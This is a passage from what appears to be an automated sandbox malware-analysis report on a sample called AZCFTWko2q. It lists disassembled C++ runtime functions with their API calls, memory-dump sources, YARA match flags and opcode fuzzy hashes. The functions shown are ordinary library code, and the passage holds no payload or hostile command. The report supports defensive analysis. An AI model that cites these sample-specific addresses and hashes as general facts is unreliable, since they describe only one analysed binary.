                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                                      • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                      • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                                      • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                                                                      Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4275183328-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                                      • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                                                                      Function 024F239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024F25EC,00000001,00000001,?), ref: 024F23F5
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024F25EC,00000001,00000001,?,?,?,?), ref: 024F247B
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024F2575
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 024F2582
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 024F258B
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 024F25B0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                                      • Instruction ID: 0642dd2eb166db768a0b98625d43155c98bcc3e6c1f2041f0ae306150e7229b4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C251E472A00216ABEF65CF64CC60EBF77AAEB84754F15462EFE04DA240DBB4DD41CA50
                                                                                                                                                                                                                                                                                      Function 024EE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                                      • Instruction ID: 96b78b82e7906375045d5c8c788de5a7420c401cbafbab4d17b7c9cc150811c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB51E972A00205ABFF249FA9CC40B6F77A9EF49376F10425FF91696291EB31D5018B64
                                                                                                                                                                                                                                                                                      Function 024E302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024E3051
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024D8ABD
                                                                                                                                                                                                                                                                                      • SafeSQueue.LIBCONCRT ref: 024E306A
                                                                                                                                                                                                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 024E312A
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E314B
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E3159
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3496964030-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                                      • Instruction ID: 669c6653efd94635fa2e009c93dcdd71215a4c799aca5a72e4c8ab8d0a16a8cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31EE31A006119FDF26EF6AC890A7ABBA5AF44712F1045AED8078B255DB70A845CFC0
                                                                                                                                                                                                                                                                                      Function 024E8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024E8F77
                                                                                                                                                                                                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024E8F90
                                                                                                                                                                                                                                                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024E8F97
                                                                                                                                                                                                                                                                                      • PMDtoOffset.LIBCMT ref: 024E8FB6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1467055271-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                                      • Instruction ID: 6d3bb7015e6ed4c77b9c5ad709421cad8b50ac3aaf097d975831374fde9240d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E216872A042049FEF24DFA8CC05E6E77A6EF44352B10821FE903D3290E731E941CE92
                                                                                                                                                                                                                                                                                      Function 024C5437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e95efde53d1a1d55f37b0c356b08edf9e84439c8fbec09670d2861229bdb023
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217175C04208AADF55EBADD840BDEB7F9AF08325F74402FE104B7240DB7899448A75
                                                                                                                                                                                                                                                                                      Function 024E9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E904F
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024E905D
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024E9076
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E90C8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction ID: 2714f903b9eb1b41c4c4113ca7c86f4d5b0917adb0489019d0e1b013ca9af12c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201D4322097216FBE3527B5AC88AA72745EB05777B30033FE522553E1EF1288554D89
                                                                                                                                                                                                                                                                                      Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,7F07A088), ref: 00428DE8
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,7F07A088), ref: 00428E61
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                                                                      Function 024C4FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024C4FCA
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 024C4FE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024C4FEA
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 024C501B
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024C5031
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C504F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction ID: 72d8678bbb20361dd4b4f23bfdc364d9d93a667f968aed83d728c298ff0ca221
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7911A0399002189BCB65EB69D900AAE77B2BF04324F74011FE416BB390DF74AA058FD4
                                                                                                                                                                                                                                                                                      Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                                                                      Function 024CC3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024CC401
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 024CC418
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024CC421
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 024CC452
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024CC468
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC486
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                                      • Instruction ID: 1ee5f96832ed2fae7e2ae468e4368d9f71a519fe0dd3b6c4ce8637cae64c223a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE11CE79900228ABCF55EBA9D884AEE7772AF40714F34411FE815AB2A0DF748A01CF94
                                                                                                                                                                                                                                                                                      Function 024C4E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024C4E8C
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 024C4EA3
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024C4EAC
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 024C4EDD
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024C4EF3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C4F11
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction ID: d9c20067d2a9bb7bfa1c5afec29493e2bad5dbcd634e420e7a3b0ee830e3f39b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9911AC799002289BCF55EBA9E910AAE77B2AF44324F34011FE811A72A0DF749A01CF95
                                                                                                                                                                                                                                                                                      Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                                      • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                                                                      Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
